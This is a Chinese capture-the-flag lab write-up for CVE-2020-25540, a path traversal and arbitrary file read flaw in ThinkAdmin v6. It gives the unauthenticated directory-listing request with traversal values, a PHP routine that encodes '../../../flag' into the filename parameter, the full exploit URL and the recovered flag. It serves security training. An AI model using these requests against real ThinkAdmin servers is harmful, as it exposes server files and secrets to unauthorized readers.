春秋云镜 CVE-2020-25540

春秋云镜 CVE-2020-25540 Thinkadmin v6任意文件读取漏洞

靶标介绍

ThinkAdmin 6版本存在路径查找漏洞,可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。

启动场景

漏洞利用

1、未授权列目录poc

读取网站根目录Payload: http://think.admin/ThinkAdmin/public/admin.html?s=admin/api.Update/node

POST:

rules="/"

rules=".../.../.../" (目录穿越)

2、任意文件读取

使用加密函数对文件名进行加密

php 复制代码
<?php
function encode($content)
{
    [$chars, $length] = ['', strlen($string = iconv('UTF-8', 'GBK//TRANSLIT', $content))];
    for ($i = 0; $i < $length; $i++) $chars .= str_pad(base_convert(ord($string[$i]), 10, 36), 2, 0, 0);
    return $chars;
}
$content="../../../flag";
echo encode($content);
?>

加密后的文件名为1a1a1b1a1a1b1a1a1b2u302p2v

请求http://eci-2ze3dysieeo26l90ip96.cloudeci1.ichunqiu.com/admin.html?s=admin/api.Update/get/encode/1a1a1b1a1a1b1a1a1b2u302p2v

base64解密得到文件内容

得到flag

flag{cef71ab7-c930-408d-8074-52350766063b}

相关推荐
持敬chijing7 小时前
CTFshow-WEB-新年好?解题思路
安全·web安全·网络安全·网络攻击模型
hasty8 小时前
返回一个文件,为何越过整个目录?Khoj 静态资源路由的安全边界
数据库·安全
云杂项10 小时前
A Survey of Privacy Attacks in Machine Learning(个人笔记)
人工智能·安全·机器学习
其实防守也摸鱼10 小时前
内网安全防护实践:从攻击视角理解防御要点
java·前端·安全·架构·自动化·nps
treesforest10 小时前
网络安全中的IP地址查询:从日志里的一条线索到溯源的关键证据
网络·web安全·php
未来之窗软件服务11 小时前
自考大学★信息安全●简答题—东方仙盟
安全·web安全·仙盟创梦ide·东方仙盟
UCloud_TShare11 小时前
从DeepSeek Elastic Compute到UCloud Agent Sandbox:构建安全、可控的Agent执行环境
安全
xbzb12 小时前
Linux SELinux 安全加固与标签排错手册
linux·运维·安全
其实防守也摸鱼12 小时前
SQL注入实验笔记
android·运维·数据库·安全·oracle·自动化
jimmyleeee12 小时前
大模型安全之三十五:间接Prompt 注入测试全景指南
安全·prompt